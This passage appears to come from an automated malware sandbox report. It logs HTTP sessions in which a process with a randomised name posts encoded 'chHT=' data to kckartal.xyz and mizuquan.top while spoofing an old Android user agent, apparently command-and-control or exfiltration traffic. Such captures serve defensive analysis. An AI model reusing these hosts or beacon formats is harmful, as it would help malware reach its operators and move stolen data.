                      Data Raw: 63 68 48 54 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 70 54 79 76 45 71 4a 65 6c 77 75 6f 4b 53 55 31 66 78 45 4f 75 70 4e 63 34 67 45 59 35 72 38 46 5a 6c 32 6e 5a 52 64 72 69 33 71 5a 41 69 30 4c 71 69 50 4b 69 4c 67 7a 37 58 62 39 4f 42 66 34 77 2b 49 43 42 33 44 63 6e 63 38 54 31 6d 57 61 79 6f 65 73 6c 6f 6e 34 42 5a 4f 56 31 4b 53 37 68 4d 65 79 34 56 46 4d 39 61 42 4d 66 34 43 4a 71 67 44 32 47 47 6b 2f 62 30 6e 64 48 6b 54 71 35 41 46 59 69 6d 42 36 78 73 53 56 77 62 70 67 38 5a 72 77 38 59 79 73 69 65 5a 39 79 49 4a 31 53 38 44 6e 64 38 6a 37 31 6b 49 50 63 3d
                      Data Ascii: chHT=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYpTyvEqJelwuoKSU1fxEOupNc4gEY5r8FZl2nZRdri3qZAi0LqiPKiLgz7Xb9OBf4w+ICB3Dcnc8T1mWayoeslon4BZOV1KS7hMey4VFM9aBMf4CJqgD2GGk/b0ndHkTq5AFYimB6xsSVwbpg8Zrw8YysieZ9yIJ1S8Dnd8j71kIPc=
                      Sep 10, 2024 08:50:19.681222916 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:19 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qv5WW7UKpXlD%2BkuY5mdUWVBDlLL%2FIu3OVU7KT2MEsVo0bySIRz1%2F%2BJebXGhkS7eHtVspHkHivZpQZUf%2BAwSHrvUycTxLjwGvNcstzZBCoIKGlCQP9MWGLPiwRfNhpAThIaW%2B"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7bafccea7cee-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                      Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9S
                      Sep 10, 2024 08:50:19.681370020 CEST237INData Raw: fa 53 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04
                      Data Ascii: SM[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.449768104.21.20.125801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:21.646965027 CEST10824OUTPOST /h5qr/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Origin: http://www.kckartal.xyz
                      Referer: http://www.kckartal.xyz/h5qr/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 78 54 31 63 4d 71 49 38 4e 77 76 6f 4b 53 61 56 66 30 45 4f 75 4f 4e 64 52 70 45 59 30 55 38 47 68 6c 77 45 68 52 55 36 69 33 77 4a 41 69 39 72 71 6a 52 36 6a 44 67 79 4c 54 62 35 75 42 66 34 77 2b 49 42 4a 33 45 4f 44 63 2b 54 31 6c 58 61 7a 70 4d 63 6c 4d 6e 34 34 69 4f 52 70 77 52 49 35 4d 65 53 49 56 4a 66 46 61 4e 4d 66 36 50 70 71 34 44 7a 65 64 6b 37 37 47 6e 64 44 64 54 71 4e 41 48 66 6a 69 46 36 74 6d 45 6b 74 42 36 43 4d 46 6e 48 49 7a 33 4c 79 2f 52 4e 6e 53 4c 6d 2b 45 4a 47 6c 30 38 62 74 67 52 61 68 50 70 6f 54 4a 64 6f 36 6d 6d 33 32 68 69 54 41 67 43 71 4a 70 4f 48 44 45 4a 56 42 32 56 53 75 5a 7a 31 36 62 58 37 7a 43 67 54 57 37 52 57 35 7a 50 69 37 46 36 6e 34 51 78 67 42 33 4e 58 69 45 6e 56 66 46 51 50 55 78 36 78 37 44 72 39 72 57 50 65 57 49 43 48 6b 52 78 68 6d 6e 71 41 58 46 6f 41 75 45 41 63 56 58 37 58 67 4f 32 63 39 30 67 59 42 41 7a [TRUNCATED]
                      Data Ascii: chHT=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYxT1cMqI8NwvoKSaVf0EOuONdRpEY0U8GhlwEhRU6i3wJAi9rqjR6jDgyLTb5uBf4w+IBJ3EODc+T1lXazpMclMn44iORpwRI5MeSIVJfFaNMf6Ppq4Dzedk77GndDdTqNAHfjiF6tmEktB6CMFnHIz3Ly/RNnSLm+EJGl08btgRahPpoTJdo6mm32hiTAgCqJpOHDEJVB2VSuZz16bX7zCgTW7RW5zPi7F6n4QxgB3NXiEnVfFQPUx6x7Dr9rWPeWICHkRxhmnqAXFoAuEAcVX7XgO2c90gYBAzrDY8vALwSaSam543Bqu3cinwRNezkbD/O6lBsXnwpdGif8b93+Y1NUa61qkVE4MszyQydvWkaxghowpT8tQPhsyKBVB1TxSj65X5hgJ0hDDKLqNBKnI5LPd25Ih3xI86HyAVuoSqufoDRguMbXnhCmTgZbPDsNR2VaE2/fF1XMd9uCqsiaZQTOHRSlaNbZfMDOo+3SUKSF00q4hK0sJq3ApsaKePTpB5jXuUPbsTEGrnqCMJlhAWrATyuA8ovqWL6KSdc7RtTKdbwULBWSDvRBwXUZSQyFgldew5BA+YucX5qj4blfp+jAwx6AfTUnSDUtUq8E2IDdNGoY8AC6Q+r/iOsNYXfRnOU9AgrA2752b5UNPzJjPq/u5M6KpO6NVmPC55k7N9x1ZgyJzLDD2LPys5rSGNWRVppup5YYtM8AZhi06SmBXONE4MYYG7+KsSMUWTdfJHWj13WdXIu1+ntwAyhWWS0lVfxRm4/WcGDUc/6zJ9/8EMk5iaAA1J8ii+0iCIYVeH3e5YWXW2pFiTi/K0Lyx4WGYFMgt80X1C3llsRqNB99aMai7PjZIGq7EPJVnM+G1SOk7iYpRxa/dYSd18CvF+F/fioFITuVCD6HdyCWBh7hr1ZNHwXzjgvpBxx657ZiLqvLeiPQnpw1/opzKfsqjeB3kYFd [TRUNCATED]
                      Sep 10, 2024 08:50:22.233865023 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:22 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2m%2Bncc8eGcdlDIJmomxfM4k%2F6WkBYGWB5M9SBzAvpF4WNGSCGo4VGHYGtb9R38cnD1quIsaVfXr35WiJ9ZAbjVTAjkRd0Hp2yMXzs1s3mDMAQ69MNoM36PMrMps%2B%2BiKr9F1"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7bbfbfa01821-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                      Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                      Sep 10, 2024 08:50:22.233880043 CEST233INData Raw: a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72
                      Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.449769104.21.20.125801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:24.191428900 CEST459OUTGET /h5qr/?chHT=/bmdZ0vLXnogocV0iYIh9qPv22C1+ePhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5evw/1eyPyHW7+NkDn/WIzzX8wvew4kJYzT8Us=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:50:24.776423931 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:24 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGp%2Ft1aV%2Bhqq2w7fdEl%2FHfZElDFK20CfwsZ1tcFqO%2BSVUMOKziATmlnZcbtspJ4N1iMUFzadvRbw2C8tJp%2FWyOctwGoteIrMAcNtP6A9wkGBdW7HepNjneLJYmLIrw9ieIP7"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7bcfab30c47c-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                      Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolut
                      Sep 10, 2024 08:50:24.776447058 CEST734INData Raw: 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74
                      Data Ascii: e; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.44977043.242.202.169801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:30.473124027 CEST722OUTPOST /ed2j/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Origin: http://www.mizuquan.top
                      Referer: http://www.mizuquan.top/ed2j/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 42 56 53 2f 59 34 69 68 50 6a 74 2b 66 5a 2f 69 6f 70 74 76 62 35 75 6c 64 7a 76 72 4b 6d 33 6a 77 3d 3d
                      Data Ascii: chHT=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hBVS/Y4ihPjt+fZ/ioptvb5uldzvrKm3jw==
                      Sep 10, 2024 08:50:31.342704058 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:31 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.44977143.242.202.169801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:33.024079084 CEST742OUTPOST /ed2j/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Origin: http://www.mizuquan.top
                      Referer: http://www.mizuquan.top/ed2j/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 64 2f 54 6e 68 2b 52 6b 43 62 53 41 37 57 68 6c 62 45 74 42 2f 33 62 66 58 33 72 43 48 50 68 32 48 62 34 6c 61 4d 6e 51 76 77 62 65 71 4c 69 37 77 48 70 53 7a 52 75 55 65 38 58 30 59 79 54 62 4d 2f 69 73 74 4c 6d 34 37 7a 6e 78 46 65 4c 57 52 45 59 58 7a 30 63 79 47 6b 57 2f 61 78 37 67 4e 79 53 47 64 65 5a 49 4d 74 4a 74 54 56 77 78 57 76 70 43 6a 30 35 53 30 45 77 37 30 31 67 4f 58 2b 79 35 49 6c 7a 5a 49 36 39 62 64 64 34 61 36 62 6d 4a 62 2b 34 38 35 6c 71 66 47 79 72 54 69 68 70 6f 4b 4f 6c 72 64 45 71 34 59 3d
                      Data Ascii: chHT=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vd/Tnh+RkCbSA7WhlbEtB/3bfX3rCHPh2Hb4laMnQvwbeqLi7wHpSzRuUe8X0YyTbM/istLm47znxFeLWREYXz0cyGkW/ax7gNySGdeZIMtJtTVwxWvpCj05S0Ew701gOX+y5IlzZI69bdd4a6bmJb+485lqfGyrTihpoKOlrdEq4Y=
                      Sep 10, 2024 08:50:33.880614042 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:33 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.44977243.242.202.169801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:35.569287062 CEST10824OUTPOST /ed2j/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Origin: http://www.mizuquan.top
                      Referer: http://www.mizuquan.top/ed2j/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 56 2f 54 55 70 2b 65 6a 2b 62 54 41 37 57 6f 46 62 48 74 42 2f 36 62 62 37 7a 72 43 4c 35 68 30 2f 62 71 32 53 4d 6a 52 76 77 41 4f 71 4c 75 62 77 47 30 43 7a 2b 75 55 75 34 58 30 49 79 54 62 4d 2f 69 74 64 4c 77 64 58 7a 6c 78 46 5a 42 32 52 59 53 48 7a 63 63 79 76 52 57 2b 75 4c 36 51 74 79 52 6d 4e 65 55 65 34 74 49 4e 54 58 31 78 58 70 70 43 6d 32 35 53 59 2b 77 34 6f 54 67 4f 6a 2b 79 39 35 46 69 4e 55 62 70 71 74 39 6b 4a 69 6b 2f 72 54 61 38 75 4a 70 35 64 33 6d 35 42 57 71 6d 71 72 71 31 34 31 59 6f 6f 36 56 6d 69 6f 49 50 73 6f 4e 43 75 61 45 46 77 46 6a 31 42 31 6e 41 57 4c 2f 6d 47 50 69 41 59 63 6e 37 61 76 5a 32 4e 6a 6c 46 56 71 2f 65 56 44 6c 55 45 64 46 49 65 6c 2b 2f 55 70 53 44 46 4d 34 37 56 78 65 32 56 34 4b 39 58 52 48 43 39 46 34 6f 2b 64 2f 4a 76 61 58 68 52 39 30 75 4a 38 6c 66 69 42 6b 64 6d 50 4d 46 42 58 6c 30 50 34 72 4a 47 56 34 76 [TRUNCATED]
